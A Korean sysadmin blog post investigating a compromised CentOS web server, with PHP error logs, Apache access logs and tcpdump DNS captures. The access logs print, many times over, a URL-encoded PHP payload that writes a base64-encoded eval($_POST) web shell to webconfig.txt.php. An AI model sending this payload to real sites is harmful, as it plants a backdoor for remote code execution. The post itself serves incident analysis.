본문 바로가기
Linux

[CentOS] 해킹점검 내용 - eval

Heartbleed 2016. 5. 12. 11:18



vi /var/log/message

May 3 16:50:04 localhost httpd: PHP Warning: session_start(): open(/data/home2/mallcfg/public_html/data/session/sess_p0j0fn4els8ka8c3fd47sbpab2, O_RDWR) failed: Permission denied (13) in/data/home2/mallcfg/public_html/core/framework/core/base.php(5) : eval()'d code(1) : eval()'d code on line 2

eval()'d code(1)  로그메세지에 eval 함수 php 발견


웹로그 ( 140.117.150.103 타이완 )
- 아래 로그 호출시간이 실제 유출된 날짜와 일치함.

140.117.150.103 - - [08/May/2016:12:03:11 +0900] 'GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1' 200 363
140.117.150.103 - - [08/May/2016:12:03:11 +0900] 'GET /administrator/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1' 404 212
140.117.150.103 - - [08/May/2016:12:03:13 +0900] 'GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1' 200 363

140.117.150.103 - - [03/May/2016:06:33:39 +0900] 'GET /administrator/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1' 404 212
140.117.150.103 - - [03/May/2016:06:33:39 +0900] 'GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1' 200 28174
140.117.150.103 - - [03/May/2016:06:33:41 +0900] 'GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1' 200 28174
140.117.150.103 - - [03/May/2016:06:33:48 +0900] 'GET /administrator/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1' 404 212
140.117.150.103 - - [03/May/2016:06:33:48 +0900] 'GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1' 302 -
140.117.150.103 - - [03/May/2016:06:33:49 +0900] 'GET /administrator//webconfig.txt.php HTTP/1.1' 404 229
140.117.150.103 - - [03/May/2016:06:33:49 +0900] 'GET /front/bbs/ini.php?device=mobile1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1' 200 1141
140.117.150.103 - - [03/May/2016:06:33:49 +0900] 'GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1' 302 -
140.117.150.103 - - [03/May/2016:06:33:50 +0900] 'GET /front/bbs/ini.php?device=mobile1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1' 200 1141
140.117.150.103 - - [03/May/2016:10:07:59 +0900] 'GET /administrator/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1' 404 212
140.117.150.103 - - [03/May/2016:10:07:59 +0900] 'GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1' 200 29118
140.117.150.103 - - [03/May/2016:10:08:01 +0900] 'GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1' 200 29118


실제 유출시 덤프 내역

23:27:20.751468 IP xxx.xx.53.106.60337 > 120.52.32.53.53:  9196+ A? vnc8.com. (26)
23:27:20.751478 IP xxx.xx.53.106.60337 > 113.17.175.180.53:  19727+ A? vnc8.com. (26)
23:27:20.751500 IP xxx.xx.53.106.60337 > 14.18.140.32.53:  57252+ A? hx167.com. (27)
23:27:20.751520 IP xxx.xx.53.106.60337 > 113.17.175.180.53:  53764+ A? vnc8.com. (26)
23:27:20.751536 IP xxx.xx.53.106.60337 > 120.52.32.53.53:  6389+ A? vnc8.com. (26)

23:00:01.186493 IP xxx.xx.53.106.59419 > 173.245.59.226.53:  49771+ A? salangane-books.com. (37)
23:00:01.186526 IP xxx.xx.53.106.59419 > 173.245.59.226.53:  30438+ A? salangane-books.com. (37)
23:00:01.186551 IP xxx.xx.53.106.59419 > 173.245.59.226.53:  54579+ A? salangane-books.com. (37)
23:00:01.186575 IP xxxx.xx.53.106.59419 > 173.245.59.226.53:  30763+ A? salangane-books.com. (37)
23:00:01.186601 IP xxx.xx.53.106.59419 > 173.245.59.226.53:  39498+ A? salangane-books.com. (37)



테스트 결과 아래 로그 처럼 해당 URL호출 했을때 아래 base.php파일을 호출하게 됩니다.
에러를 표기하지 않음으로써 웹쉘 파일 사용한것으로 확인됨.

- URL호출
xxx.xxx.87.2 - - [09/May/2016:12:47:20 +0900] 'GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1' 200 248061

- 시스템 로그확인
May 9 12:47:20 localhost httpd: PHP Warning: session_start(): open(/data/home2/mallcfg/public_html/data/session/sess_i7f8nh486i1kndpjv4fgt2j4m4, O_RDWR) failed: Permission denied (13) in /data/home2/mallcfg/public_html/core/framework/core/base.php(5) : eval()'d code(1) : eval()'d code on line 2



저작자표시

'Linux' 카테고리의 다른 글

[IPTABLES] 53번 포트 OUT바운드 포트 차단  (0) 2016.05.12
[CentOS] 해킹점검 - perl  (0) 2016.05.12
[CentOs6.x] portsentry-1.0 설치 및 테스트  (0) 2016.03.28
[CentOs 6.x] ssh_exchange_identification: read: Connection reset by peer 에러  (1) 2016.03.04
[CentOS 6.x]NFS 설정 및 관련 포트 고정 설정  (0) 2016.02.23

'Linux' Related Articles

티스토리툴바